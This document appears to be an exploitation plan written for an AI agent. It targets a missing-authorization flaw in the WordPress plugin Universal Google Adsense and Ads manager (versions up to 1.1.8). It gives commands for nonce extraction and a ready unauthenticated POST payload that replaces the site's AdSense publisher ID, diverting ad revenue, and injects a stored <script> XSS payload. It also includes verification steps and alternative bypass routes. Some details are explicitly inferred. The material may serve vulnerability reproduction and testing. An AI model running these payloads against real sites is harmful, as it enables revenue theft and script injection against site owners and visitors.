Universal Google Adsense and Ads manager <= 1.1.8 - Missing Authorization

Because the source code for the Universal Google Adsense and Ads manager plugin (version <= 1.1.8) is not provided, this plan relies on the vulnerability description and common patterns found in "Missing Authorization" vulnerabilities within WordPress AJAX handlers. The primary goal of the agent is to identify the specific AJAX action that allows modification of plugin settings.

1. Vulnerability Summary

The Universal Google Adsense and Ads manager plugin for WordPress is vulnerable to Missing Authorization. A function reachable via the WordPress AJAX API (admin-ajax.php) fails to implement a current_user_can() check. This allows unauthenticated attackers to trigger the function and perform unauthorized actions, most likely modifying the plugin's AdSense settings (e.g., changing the AdSense Publisher ID to redirect revenue).

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: To be determined via discovery (likely uga_save_settings, uga_update_options, or similar).
• HTTP Method: POST
• Authentication: Unauthenticated (requires a wp_ajax_nopriv_ hook registration).
• Payload: URL-encoded parameters representing plugin settings (e.g., adsense_id=pub-attacker).
• Preconditions: The plugin must be active.

3. Code Flow (Inferred)

1. Entry Point: An unauthenticated user sends a POST request to wp-admin/admin-ajax.php with a specific action parameter.
2. Hook Trigger: WordPress triggers the hook wp_ajax_nopriv_{action}.
3. Vulnerable Function: The callback function associated with the hook is executed.
4. Missing Check: The callback function lacks a capability check (e.g., if (!current_user_can('manage_options'))).
5. Sink: The function processes the $_POST data and calls update_option() or update_site_option(), overwriting the legitimate AdSense configuration.

4. Nonce Acquisition Strategy

If the plugin uses check_ajax_referer() or wp_verify_nonce(), the agent must retrieve a valid nonce.

1. Identify Action: Search the codebase for wp_create_nonce to find the action string.
2. Find Localization: Search for wp_localize_script to see which JavaScript variable holds the nonce.
   • Hypothetical Variable: uga_ajax_obj (inferred)
   • Hypothetical Key: nonce (inferred)
3. Creation of Trigger Page: Many AdSense plugins only load their scripts on the frontend if a widget or shortcode is present.
   • Search for shortcodes: grep -r "add_shortcode" .
   • If a shortcode like [universal_adsense] exists, create a page:
     wp post create --post_type=page --post_status=publish --post_content='[universal_adsense]'
4. Extraction: Navigate to the new page and use browser_eval to extract the nonce:
   browser_eval("window.uga_ajax_obj?.nonce")

5. Exploitation Strategy

The agent should follow these steps:

Step 1: Discovery
Identify the vulnerable AJAX action and parameters.

# Find AJAX registrations
grep -r "wp_ajax_nopriv_" .

# Analyze the callback function of the nopriv action
# Look for update_option calls and missing capability checks

Step 2: Target Identification (Example)
Assuming the action is uga_save_settings and it saves an option called uga_settings.

• Action: uga_save_settings
• Sensitive Parameters: google_adsense_id, ads_code_1, etc.

Step 3: Execution
Submit the unauthorized update via the http_request tool.

• URL: http://<target>/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:
  action=uga_save_settings&nonce=[NONCE]&google_adsense_id=pub-9999999999999999&ads_code_1=<script>alert('XSS')</script>

6. Test Data Setup

1. Install Plugin: Ensure universal-google-adsense-and-ads-manager version 1.1.8 is installed.
2. Initial Config: Set a legitimate AdSense ID using WP-CLI:
   wp option update uga_settings '{"google_adsense_id":"pub-1234567890123456"}' --format=json (inferred option name).
3. Public Page: Create a page with the plugin's shortcode to ensure script localization (if needed for nonce).

7. Expected Results

• Response: The server returns a 200 OK or a success JSON object (e.g., {"success":true}).
• Effect: The plugin settings in the database are updated with the attacker-supplied values.

8. Verification Steps

Confirm the exploit success using WP-CLI:

# Check the value of the plugin's settings option
wp option get uga_settings --format=json

If the google_adsense_id matches pub-9999999999999999, the exploit is successful.

9. Alternative Approaches

• Admin Init Bypass: If no AJAX actions are found, check if the plugin uses admin_init to process settings. Unauthenticated users can trigger admin_init by visiting /wp-admin/admin-ajax.php.
  • Search: grep -r "admin_init" .
  • Check if the function attached to admin_init looks for $_POST['submit'] or similar without a capability check.
• XSS Path: If the plugin saves raw HTML for ads, verify if the "Missing Authorization" allows Persistent XSS by injecting a <script> tag into the ad code fields.